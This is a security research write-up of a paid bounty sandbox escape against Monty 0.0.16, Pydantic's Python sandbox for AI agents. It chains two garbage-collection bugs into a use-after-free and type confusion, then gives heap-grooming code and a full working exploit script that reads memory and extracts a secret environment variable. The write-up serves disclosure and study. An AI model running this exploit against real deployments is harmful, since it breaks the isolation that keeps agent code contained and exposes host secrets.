Pwning Pydantic's Monty: A $5K Sandbox Escape

Pydantic offered $5,000 to escape Monty, their Rust-built Python sandbox for AI agents. We chained two GC bugs into a use-after-free and walked away with the bounty.

May 7, 2026
16 min read

On April 20th Pydantic put up a $5,000 challenge for the first person to escape Monty, their custom Python interpreter and AI agent sandbox.

It was a pretty special bounty program, in that it was structured like a CTF challenge: read the flag in /app/secret.txt (or the SECRET environment variable). The challenge is black-box, meaning the server-side setup is completely unknown to us. We are only given an API to submit code to be run in the Python sandbox and a public Logfire instance to review our submissions.

Our AI agent discovered the underlying vulnerability and was able to reproduce locally; from there we spent a few hours turning the primitive into a working sandbox escape against the live environment. We were the first to submit a working escape and claim the $5,000 bounty.

We think a skilled operator could have found this manually, or with help from a general-purpose coding assistant like Claude Code, but with a lot more time and effort. As this was a competition, being able to discover the bug quickly gave us a strong advantage.

Pydantic published their own writeup of the vulnerability here.

This exploit was written for Monty version 0.0.16.

The Vulnerability

A classic class of bug in garbage-collected languages is improper tracking of live objects. Monty's interpreter defines a few sources of garbage collection “roots”. Each root object is walked to locate any referenced child objects, marking every encountered heap object as “live”. This walk proceeds recursively until all reachable objects have been visited and marked. The process is perfectly sound, as long as the proper garbage collection roots are supplied so that the recursive walk can mark every live object.

As you can probably guess, the interpreter had a bug that allowed live objects to be hidden from the garbage collection sweep, resulting in a use-after-free vulnerability. The interpreter has a few garbage collection roots: the current interpreter stack, the globals array, the JSON object cache, and the exception stack. The first bug materializes in how the interpreter handles builtin method calls. When a non-builtin function is called, the interpreter collects all the arguments passed to it and pushes them onto the interpreter stack, ensuring that they will be picked up by the garbage collection sweep. Builtin functions are handled differently: before invoking one, the interpreter first pops all of its arguments off the interpreter stack. If the only reference to an argument was through the interpreter stack, that argument would now be considered dead by the garbage collection sweep and freed in a future garbage collection cycle.

Here is a minimal PoC:

nogc = []
def trigger(item):
    if item == 0:
        for i in range(100000):
            nogc.append([5, 5, 5])
    print(item)
    return False
filter(trigger, [0, 1])
python3 run.py ./poc_builtin_uaf.py
0
5
5
thread '<unnamed>' (20392697) panicked at crates/monty/src/heap.rs:945:39:
Heap::dec_ref: object already freed
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

When this code is run, the sequence printed is 0, 5, 5 instead of the expected 0, 1. Since the garbage collection sweep is blind to arguments passed to builtin functions, the [0, 1] that is being filtered is freed during the forced garbage collection cycle and replaced with a list of just [5, 5, 5].

The second bug is also garbage collection related. Monty supports two methods of heap object access: HeapId and HeapRead. With a HeapId, the heap must be queried on every access to look up the object. A HeapRead instead stashes a pointer to the heap object directly and increments that object's readers reference count. Heap objects with a non-zero readers count should never be freed, since somewhere a HeapRead is still referencing the underlying object. Seems fine, right? Except the garbage collection sweep wasn't actually checking the readers reference count; it relied solely on object reachability.
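To make the flaw concrete, here is a toy Python model (not Monty's actual code): a mark-and-sweep pass that consults only reachability will happily free a slot that still has active readers.

```python
# Toy model of the bug: a sweep that only checks reachability from roots,
# ignoring the per-slot `readers` count that should pin the slot alive.
class Slot:
    def __init__(self, data):
        self.data = data
        self.readers = 0   # active HeapRead-style borrows

class ToyHeap:
    def __init__(self):
        self.slots = {}
        self.next_id = 0

    def alloc(self, data):
        self.slots[self.next_id] = Slot(data)
        self.next_id += 1
        return self.next_id - 1

    def sweep(self, roots):
        # BUG: a slot with readers > 0 should never be freed, but this
        # sweep looks only at reachability from `roots`.
        self.slots = {i: s for i, s in self.slots.items() if i in roots}

heap = ToyHeap()
victim = heap.alloc([0, 1])
heap.slots[victim].readers += 1   # a live HeapRead still points here
heap.sweep(roots=set())           # victim is reachable from no root
print(victim in heap.slots)       # → False: freed despite an active reader
```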

Combined, these two bugs allow for a use-after-free of a Rust heap object and subsequent type confusion.

nogc = []
def trigger(item):
    if item == 0:
        for i in range(100000):
            nogc.append([5, 5, 5])
    return 0
[0, 1, 2].sort(key=trigger)
python3 run.py ./poc_sort_uaf.py
thread '<unnamed>' (20386150) panicked at crates/monty/src/heap.rs:949:17:
Heap::dec_ref: cannot free HeapId(2) with 18446744073709551615 active reader(s)
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
thread '<unnamed>' (20386150) panicked at crates/monty/src/heap.rs:949:17:
Heap::dec_ref: cannot free HeapId(2) with 18446744073709551615 active reader(s)
stack backtrace:
0: 0x105ee9a70 - <unknown>
1: 0x105d5f600 - <unknown>
2: 0x105ee7db0 - <unknown>
3: 0x105ee7a00 - <unknown>
4: 0x105f08788 - <unknown>
5: 0x105f08744 - <unknown>
6: 0x105f08c8c - <unknown>
7: 0x1063acfb8 - _PyInit__monty
8: 0x105cab038 - <unknown>
9: 0x105c9df90 - <unknown>
10: 0x105d47918 - <unknown>
11: 0x105d42cec - <unknown>
12: 0x105ca2404 - <unknown>
13: 0x105ca29a8 - <unknown>
14: 0x10499c7c4 - _method_vectorcall_FASTCALL_KEYWORDS
15: 0x104990598 - _PyObject_Vectorcall
16: 0x104ab92e8 - __PyEval_EvalFrameDefault
17: 0x104ab75a4 - _PyEval_EvalCode
18: 0x104b27d04 - _run_eval_code_obj
19: 0x104b2774c - _run_mod
20: 0x104b25df4 - _pyrun_file
21: 0x104b25130 - __PyRun_SimpleFileObject
22: 0x104b24d68 - __PyRun_AnyFileObject
23: 0x104b4c9e0 - _pymain_run_file_obj
24: 0x104b4c68c - _pymain_run_file
25: 0x104b4b8fc - _Py_RunMain
26: 0x104b4bef8 - _pymain_main
27: 0x104b4bf98 - _Py_BytesMain
thread '<unnamed>' (20386150) panicked at /rustc/59807616e1fa2540724bfbac14d7976d7e4a3860/library/core/src/panicking.rs:233:5:
panic in a destructor during cleanup
thread caused non-unwinding panic. aborting.
[1] 41133 abort python3 run.py ./poc_sort_uaf.py

Exploitation Primitives

Now this is where we must leave the warm comfort of our high-level languages and enter the terrifying realm of pointers and native code.

The interpreter heap consists of a Vec<Page>, where each Page holds 256 Slot structures and the HeapData enum is embedded directly in the Slot struct.

const PAGE_SIZE: usize = 256;
type Page = Box<[Slot; PAGE_SIZE]>;
type Slot = MaybeUninit<Option<HeapEntry>>;

pub struct HeapEntry {
    refcount: Cell<usize>,
    /// Number of active `HeapRead` pointers into this entry's data.
    ///
    /// Incremented when `HeapReader::read` creates a `HeapRead`, decremented when
    /// the `HeapRead` is dropped. `dec_ref` panics if it would free an entry that
    /// still has active readers — this guarantees that `HeapRead` pointers remain
    /// valid for as long as they exist.
    #[serde(skip, default)] // should always be 0 during serde ops
    readers: Cell<usize>,
    /// The payload data
    data: UnsafeHeapData,
    /// Current hashing status / cached hash value
    hash_state: HashState,
}

When HeapRead grabs a raw pointer reference to the heap object it will be a pointer to the UnsafeHeapData field of one of these slots.

pub struct HeapRead<'a, T: ?Sized> {
    /// pointer to the data field of HeapEntry, past the enum discriminant
    value: NonNull<T>,
    /// pointer to the readers field of HeapEntry
    readers: NonNull<Cell<usize>>,
    borrow: PhantomData<fn(&'a T) -> &'a T>,
}

The primitive that we can build from this is an out-of-bounds heap read/write due to type confusion. The do_list_sort function assumes that the HeapData referenced by the &mut HeapRead<'h, List> is an actual List, but since we can replace the list with another object using our use-after-free vulnerability it will interpret the new HeapData as if it were a List.

This is how the List structure is defined:

pub(crate) struct List {
    items: Vec<Value>,
    contains_refs: bool,
}

This is how the structure is laid out in memory:

/* offset */
struct monty::types::list::List {
    /* 0x00 */ items: alloc::vec::Vec<monty::value::Value, alloc::alloc::Global> {
        /* 0x00 */ cap: core::num::niche_types::UsizeNoHighBit,
        /* 0x08 */ ptr: core::ptr::unique::Unique<u8>,
        /* 0x10 */ len: usize,
    },
    /* 0x18 */ contains_refs: bool,
    /* total size (bytes): 0x20 */
}

At this point in the exploit we don’t have any heap leaks and the interpreter doesn’t seem to leak any host addresses like normal Python (e.g. id(x)). So we can’t fake a valid pointer field, but we can allocate a new object with the same general structure as a List. A prime candidate for this is the Bytes structure:

pub(crate) struct Bytes(Vec<u8>);

Bytes memory layout:

/* offset */
struct monty::types::bytes::Bytes (
    /* 0x00 */ alloc::vec::Vec<u8, alloc::alloc::Global> {
        /* 0x00 */ cap: core::num::niche_types::UsizeNoHighBit,
        /* 0x08 */ ptr: core::ptr::unique::Unique<u8>,
        /* 0x10 */ len: usize,
    },
    /* total size (bytes): 0x20 */
)

Both structures begin with a Vec<T>; however, Bytes holds a Vec<u8> while List holds a Vec<Value>. A Value is 0x10 bytes in size while a u8 is 0x01 byte. do_list_sort assumes the object is a List containing a Vec<Value>, so it indexes the vector with a stride of 0x10 instead of the correct stride of 0x01, giving an out-of-bounds access primitive.
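The consequence of the stride mismatch is easy to see when modeled in plain Python. The struct format strings below are our own reconstruction of the layout dumps above, not Monty code.

```python
import struct

# Both layouts above are 0x20 bytes and begin with the same Vec triple
# (cap, ptr, len); the format strings are our reconstruction.
assert struct.calcsize("<QQQB7x") == 0x20   # List: Vec fields + contains_refs + pad
assert struct.calcsize("<QQQ8x") == 0x20    # Bytes: Vec fields + tail padding

# The stride confusion itself: one backing buffer viewed as Vec<u8>
# (stride 0x01) versus as Vec<Value> (stride 0x10).
backing = bytes(range(64))       # stand-in for Bytes' heap data

def read_u8(buf, i):
    return buf[i]                # correct indexing for Vec<u8>

def read_value(buf, i):
    # do_list_sort believes it has Vec<Value>, so "element i" is read
    # from byte offset i * 0x10
    return struct.unpack_from("<QQ", buf, i * 0x10)

print(read_u8(backing, 3))       # → 3
print(read_value(backing, 3))    # reads bytes 0x30..0x3f, 16x further in
```

For indices near the end of the real byte buffer, the 0x10 stride walks far past the allocation, which is exactly the out-of-bounds primitive used below.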

This is how the actual list sorting is implemented:

pub fn apply_permutation<T>(items: &mut [T], indices: &mut [usize]) {
    for i in 0..items.len() {
        if indices[i] == i {
            continue;
        }
        let mut current = i;
        loop {
            let target = indices[current];
            indices[current] = current;
            if target == i {
                break;
            }
            items.swap(current, target);
            current = target;
        }
    }
}
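Ported to plain Python, the cycle-following logic is easy to experiment with when working out which indices array produces a desired set of swaps:

```python
# Direct Python port of apply_permutation (behavior-equivalent).
def apply_permutation(items, indices):
    for i in range(len(items)):
        if indices[i] == i:
            continue
        current = i
        while True:
            target = indices[current]
            indices[current] = current
            if target == i:
                break
            # swap items[current] and items[target]
            items[current], items[target] = items[target], items[current]
            current = target

# A 2-cycle (0 3) swaps exactly elements 0 and 3 and touches nothing else;
# the exploit's keygen later returns pairs of mirrored indices for the
# same reason.
items = ["a", "b", "c", "d"]
apply_permutation(items, [3, 1, 2, 0])
print(items)  # → ['d', 'b', 'c', 'a']
```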

apply_permutation selectively moves values around based on the indices array, which we fully control. This lets us swap values between the Bytes vector and out-of-bounds memory, yielding an out-of-bounds heap read/write primitive.

Here is a shortened version of the do_list_sort function. The list argument is freed by our forced garbage collection cycle in the last iteration of computing compare_values and then passed into apply_permutation at the very end:

fn do_list_sort<'h>(
    list: &mut HeapRead<'h, List>,
    args: ArgValues,
    vm: &mut VM<'h, '_, impl ResourceTracker>,
) -> Result<(), RunError> {
    /* -- snip -- */
    let compare_values = if let Some(f) = key_fn {
        let len = list.get(vm.heap).items.len();
        let keys: Vec<Value> = Vec::with_capacity(len);
        let mut keys_guard = HeapGuard::new(keys, vm);
        let (keys, vm) = keys_guard.as_parts_mut();
        for i in 0..len {
            let item = list.get(vm.heap).items[i].clone_with_heap(vm);
            // !!!
            // custom key function is evaluated here
            // !!!
            keys.push(vm.evaluate_function("sorted() key argument", f, ArgValues::One(item))?);
        }
        keys_guard.into_inner()
    } else {
        /* -- snip -- */
    };
    defer_drop!(compare_values, vm);
    let len = compare_values.len();
    let mut indices: Vec<usize> = (0..len).collect();
    sort_indices(&mut indices, compare_values, reverse, vm)?;
    // !!!
    // performs the actual sorting
    // !!!
    apply_permutation(&mut list.get_mut(vm.heap).items, &mut indices);
    Ok(())
}
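For contrast, stock CPython defends against this exact pattern: list.sort detaches the list's buffer for the duration of the sort, so a key function that mutates the list raises a ValueError instead of corrupting memory.

```python
# CPython guards list.sort against concurrent mutation: the list's buffer
# is swapped out during the sort, and mutation is detected afterwards.
l = [3, 1, 2]
err = None
try:
    l.sort(key=lambda v: l.append(0) or v)   # key mutates the list mid-sort
except ValueError as e:
    err = e
print(err)  # → list modified during sort
```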

The first thing that must be done is to prevent the program from fatally panicking. When [list type].sort(...) is called it is invoked through this code path in the interpreter, which decrements the object's reference count once it goes out of scope.

fn call_attr(&mut self, obj: Value, name_id: StringId, args: ArgValues) -> Result<CallResult, RunError> {
    let this = self;
    let attr = EitherStr::Interned(name_id);
    match obj {
        Value::Ref(heap_id) => {
            defer_drop!(obj, this);
            this.heap.read(heap_id).py_call_attr(heap_id, this, &attr, args)
        }

This assertion causes the program to panic if an object whose reference count has dropped to zero would be freed while its readers count is still non-zero.

pub fn dec_ref(&mut self, id: HeapId) {
    let mut current_id = id;
    let mut work_stack = Vec::new();
    loop {
        let slot = self.entries.get_mut(current_id.index());
        let entry = slot.as_mut().expect("Heap::dec_ref: object already freed");
        if entry.refcount.get() > 1 {
            entry.refcount.update(|r| r - 1);
        } else {
            assert!(
                entry.readers.get() == 0,
                "Heap::dec_ref: cannot free HeapId({}) with {} active reader(s)",
                current_id.index(),
                entry.readers.get(),
            );

As the PoCs above show, the program currently crashes because once the object is freed it is immediately replaced by a newly allocated list object with a readers count of zero. The drop implementation of HeapRead indiscriminately decrements the readers field, underflowing the zero readers count to 18446744073709551615 (0xFFFFFFFFFFFFFFFF); when dec_ref is eventually invoked as call_attr returns, the program panics.

impl<T: ?Sized> Drop for HeapRead<'_, T> {
    fn drop(&mut self) {
        let cell = unsafe { self.readers.as_ref() };
        cell.set(cell.get() - 1);
    }
}
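The 18446744073709551615 in the panic message is exactly this wrap-around: in release builds, Rust's usize arithmetic wraps modulo 2**64, so decrementing a readers count of zero yields all-ones.

```python
# Model of `cell.set(cell.get() - 1)` on a usize of 0: unsigned 64-bit
# arithmetic wraps, producing the value seen in the panic message.
readers = 0
readers = (readers - 1) % (1 << 64)
print(readers)        # → 18446744073709551615
print(hex(readers))   # → 0xffffffffffffffff
```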

The solution to this problem is to use our newly discovered out-of-bounds heap write primitive (:P). What if we simply arranged the heap such that the Bytes vector's backing memory is allocated before the Bytes slot page on the heap? Then we can edit the readers field to a non-zero value and avoid the fatal panic.

Remote OSINT

There is one issue with this: due to the black-box nature of the challenge, we don't actually know which allocator is used on the remote, the exact version of Monty, or the exact Python 3 version. For the Monty version we can just assume the latest release, 0.0.16. For Python, I did a bit of snooping around in their public Logfire instance and discovered this string: 3.14.4 (main, Apr 8 2026, 17:38:23) [GCC 14.2.0] (printed when invoking an interactive Python session). I assumed they had some sort of containerization on the backend, so I tested different Dockerfiles to see which container they were using for this challenge. Eventually I found this:

root@a65b7b7f161c:/share# python3
Python 3.14.4 (main, Apr 8 2026, 17:38:21) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.

A stock python:3.14.4 Docker container yields almost exactly the same version string, off by only two seconds.

We still don’t exactly know how their code is running the Monty sandbox on the backend, but now we can set up a local environment that should match the remote environment almost perfectly. It also tells us that the remote allocator is the glibc allocator.

Heap Feng Shui

Before the interpreter runs any code these are the heap statistics on my local machine:

Found 136 valid chunks in tcache
Found 0 valid chunks in fastbins
Found 1 valid chunks in unsorted bin
Found 80 valid chunks in 26 small bins
Found 21 valid chunks in 16 large bins

The heap is already relatively messy and it might be even worse on remote. In order to get a consistent heap layout we have to drain the heap of larger chunks that the allocator might split up to serve smaller allocations, since we have no control over the relative heap locations of the old chunks.

By spraying byte objects of exact sizes we can fairly consistently drain the heap of the larger chunks:

packing = []
for i in range(256 + 180):
    packing.append([0x1337 + i])
amount = 0x900
lowmem = []
for i in range(32):
    packing.append(b"B" * 0x3f0)
    packing.append(b"A" * 0x3d8)
    lowmem.append(b"Z" * 0x420); packing.append(b"A" * 0x3d8)
    lowmem.append(b"Z" * 0x820); packing.append(b"A" * 0x3d8)

After this code is run:

Found 130 valid chunks in tcache
Found 0 valid chunks in fastbins
Found 1 valid chunks in unsorted bin
Found 21 valid chunks in 16 small bins
Found 1 valid chunks in 1 large bins

Once the larger chunks are gone, the heap is forced to use linear memory to serve new allocations. As long as our new allocations are larger than the remaining freed chunks on the heap, linear memory will be used, which guarantees consistent relative object offsets.

# amount is 0x900
packing.append(b"N" * amount)
lowmem.append(b"Z" * amount)
packing.append(b"A" * 0x3d8)
for i in range(100):
    packing.append([0x1337 + i])

The 0x910 sized chunk is our b"Z" * amount byte object and the 0xc010 sized chunk is the heap Page that will contain the victim List object. The 0x3e0 sized chunk is there to prevent coalescing of large free chunks.

Chunk(base=0x6435aa781e90, addr=0x6435aa781ea0, size=0x910, flags=PREV_INUSE)
Chunk(base=0x6435aa7827a0, addr=0x6435aa7827b0, size=0x3e0, flags=PREV_INUSE)
Chunk(base=0x6435aa782b80, addr=0x6435aa782b90, size=0xc010, flags=PREV_INUSE)

As long as this relative layout of objects is created on the heap we can entirely disregard the state of the rest of the heap.

Exploitation (The Fun Part)

offset = 0x3e
x = 0
gc = []
def keygen(key):
    global x, lowmem
    state = x
    x += 1
    if state == amount - 1:
        print("forcing gc")
        for i in range(99454):
            gc.append([])
        lowmem.clear()
        gc.append([b"A" * 0x10])
        x = b"\x02\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\x80\x01\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\x0f\x00\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\x80\x01\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0".ljust(amount, b"B")
        print("ok")
    if state == 0:
        return 0x580
    elif state == 0x580:
        return 0
    elif state == 1:
        return 0x93+offset
    elif state == 0x93+offset:
        return 1
    elif state == 2:
        return 0x94+offset
    elif state == 0x94+offset:
        return 2
    elif state == 3:
        return 0x91+offset
    elif state == 0x91+offset:
        return 3
    elif state == 4:
        return 0x92+offset
    elif state == 0x92+offset:
        return 4
    else:
        return state
([0] * amount).sort(key=keygen)

On the last iteration of the list indices generation we allocate an exact number of lists to trigger a garbage collection cycle, freeing the list object referenced by the sort. The lowmem list is cleared right before allocating the final list so the original 0x910 sized b"Z" * amount byte object will be garbage collected and replaced with the new x = ... bytes object. The heap slot previously used by the victim List object is now occupied by the newly created bytes object with the backing memory of the bytes object at a stable relative offset from the heap slot.

/* byte object backing memory */
Chunk(base=0x6435aa781e90, addr=0x6435aa781ea0, size=0x910, flags=PREV_INUSE)
/* padding chunk */
Chunk(base=0x6435aa7827a0, addr=0x6435aa7827b0, size=0x3e0, flags=PREV_INUSE)
/* byte object slot in this Page */
Chunk(base=0x6435aa782b80, addr=0x6435aa782b90, size=0xc010, flags=PREV_INUSE)

With this setup, exploitation is simple. The first swap overwrites the bytes object's reference count to avoid the non-zero readers panic in dec_ref. The rest of the swaps create a fake bytes object in the same Page as the real bytes object. We sprayed list objects into the packing array earlier to guarantee that this page is filled with list objects. The fake bytes object has a pointer field of 0 and a length of (1<<60)-1. Indexing this fake bytes object with a memory address therefore reads the memory at that address, since the base pointer is 0 and the length covers the entire userland address space. The last step is to acquire a heap leak, which is done by swapping a heap pointer from a random list object in the heap Page into the bytes object, where it can be parsed out later.
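As a sanity check, the fake-header payload built inside keygen can be decoded offline as little-endian qwords. The field meanings are our own reconstruction, not a documented layout, but the zero pointer and the (1 << 60) - 1 length described above are visible in the dump.

```python
import struct

# The literal written into `x` by keygen, decoded as ten little-endian
# qwords. Which qword is which field is our guess from the layout dumps.
payload = (b"\x02\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0"
           b"\x01\0\0\0\0\0\0\x80\x01\0\0\0\0\0\0\0"
           b"\x00\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\x0f"
           b"\x00\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\x80"
           b"\x01\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0")
qwords = struct.unpack("<10Q", payload)
for i, q in enumerate(qwords):
    print(f"qword {i}: {q:#018x}")

assert 0x0fffffffffffffff in qwords   # the fake length: (1 << 60) - 1
assert (1 << 60) - 1 == 0x0fffffffffffffff
```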

Now all that is left is to search for the corrupted list object in the packing array by iterating until the corrupted length is found:

def qword(b, o):
    return b[o] | (b[o + 1] << 8) | (b[o + 2] << 16) | (b[o + 3] << 24) | (b[o + 4] << 32) | (b[o + 5] << 40) | (b[o + 6] << 48) | (b[o + 7] << 56)
first = qword(x, 0)
print("bad", first)
if first != 1:
    raise Exception("good")
print(x[:32])
print(hex(qword(x, 16)))
fake = None
for i in range(1, 101):
    l = len(packing[-i])
    print(l)
    if l != 1:
        fake = packing[-i]
        break
if fake == None:
    raise Exception("fake")
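The hand-rolled qword helper is presumably there because Monty's builtin surface is limited; under full CPython it is equivalent to int.from_bytes:

```python
# Same helper as in the exploit: assemble a little-endian u64 from bytes.
def qword(b, o):
    return (b[o] | (b[o + 1] << 8) | (b[o + 2] << 16) | (b[o + 3] << 24)
            | (b[o + 4] << 32) | (b[o + 5] << 40) | (b[o + 6] << 48)
            | (b[o + 7] << 56))

buf = bytes.fromhex("efbeaddeefbeadde")
assert qword(buf, 0) == int.from_bytes(buf[0:8], "little")
print(hex(qword(buf, 0)))  # → 0xdeadbeefdeadbeef
```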

Finally, we use the heap leak to scan for stack pointers and enumerate the stack for the SECRET= environment variable. The program is terminated early with a raise Exception(...) to avoid interpreter panics caused by the corrupted state of the heap.

o = qword(x, 0x20)
print(hex(o))
while True:
    if fake[o + 5] == 0x7f:
        break
    o += 8
leak = qword(fake, o)
print(hex(leak))
while True:
    if fake[leak - 1] == 0 and fake[leak] == 0x53 and fake[leak + 1] == 0x45 and fake[leak + 2] == 0x43 and fake[leak + 3] == 0x52 and fake[leak + 4] == 0x45 and fake[leak + 5] == 0x54 and fake[leak + 6] == 0x3d:
        break
    leak += 1
print(hex(leak))
start = leak
while fake[leak] != 0:
    leak += 1
raise Exception(fake[start:leak].decode())
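The scan loop can be checked locally by running the same logic over a synthetic stack buffer. The find_secret helper and buffer contents below are ours, for illustration only.

```python
# Same scan as the exploit: find a NUL byte followed by b"SECRET=", then
# read forward to the next NUL and decode the whole variable.
def find_secret(mem, start):
    leak = start
    while not (mem[leak - 1] == 0 and mem[leak:leak + 7] == b"SECRET="):
        leak += 1
    end = leak
    while mem[end] != 0:
        end += 1
    return mem[leak:end].decode()

# Synthetic "stack memory" holding NUL-separated environment strings.
fake_stack = b"PATH=/usr/bin\x00SECRET=hunter2\x00HOME=/root\x00"
print(find_secret(fake_stack, 1))  # → SECRET=hunter2
```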

The exploit isn't perfect by any means. The initial heap setup can be improved, the hardcoded list allocation count that forces garbage collection needs specific tuning, and assumptions are made about the initial program state. But it's good enough to exploit the sandbox and leak the secret value from their honeypot.

SECRET=4HIPD4rQ1C2FeF946Um3WUqHKhiB1YzrNpixKs5SeXerwLodBc

Full Exploit Script

packing = []
for i in range(256 + 180):
    packing.append([0x1337 + i])
amount = 0x900
lowmem = []
for i in range(32):
    packing.append(b"B" * 0x3f0)
    packing.append(b"A" * 0x3d8)
    lowmem.append(b"Z" * 0x420); packing.append(b"A" * 0x3d8)
    lowmem.append(b"Z" * 0x820); packing.append(b"A" * 0x3d8)
packing.append(b"N" * amount)
lowmem.append(b"Z" * amount)
packing.append(b"A" * 0x3d8)
for i in range(100):
    packing.append([0x1337 + i])
offset = 0x3e
x = 0
gc = []
def keygen(key):
    global x, lowmem
    state = x
    x += 1
    if state == amount - 1:
        print("forcing gc")
        for i in range(99454):
            gc.append([])
        lowmem.clear()
        gc.append([b"A" * 0x10])
        x = b"\x02\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\x80\x01\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\x0f\x00\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\x80\x01\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0".ljust(amount, b"B")
        print("ok")
    if state == 0:
        return 0x580
    elif state == 0x580:
        return 0
    elif state == 1:
        return 0x93+offset
    elif state == 0x93+offset:
        return 1
    elif state == 2:
        return 0x94+offset
    elif state == 0x94+offset:
        return 2
    elif state == 3:
        return 0x91+offset
    elif state == 0x91+offset:
        return 3
    elif state == 4:
        return 0x92+offset
    elif state == 0x92+offset:
        return 4
    else:
        return state
([0] * amount).sort(key=keygen)
print("lmfao")
def qword(b, o):
    return b[o] | (b[o + 1] << 8) | (b[o + 2] << 16) | (b[o + 3] << 24) | (b[o + 4] << 32) | (b[o + 5] << 40) | (b[o + 6] << 48) | (b[o + 7] << 56)
first = qword(x, 0)
print("bad", first)
if first != 1:
    raise Exception("good")
print(x[:32])
print(hex(qword(x, 16)))
fake = None
for i in range(1, 101):
    l = len(packing[-i])
    print(l)
    if l != 1:
        fake = packing[-i]
        break
if fake == None:
    raise Exception("fake")
o = qword(x, 0x20)
print(hex(o))
while True:
    if fake[o + 5] == 0x7f and fake[o + 4] >= 0xd0 and fake[o + 3] != 0:
        break
    o += 8
leak = qword(fake, o)
print(hex(leak))
while True:
    if fake[leak - 1] == 0 and fake[leak] == 0x53 and fake[leak + 1] == 0x45 and fake[leak + 2] == 0x43 and fake[leak + 3] == 0x52 and fake[leak + 4] == 0x45 and fake[leak + 5] == 0x54 and fake[leak + 6] == 0x3d:
        break
    leak += 1
print(hex(leak))
start = leak
while fake[leak] != 0:
    leak += 1
secret = fake[start:leak].decode()
print(secret)
raise Exception(secret)

Owen Kwan (@unvariantwinter) is an intern at Veria Labs. Veria was founded by members of .;,;., the #1 US CTF team.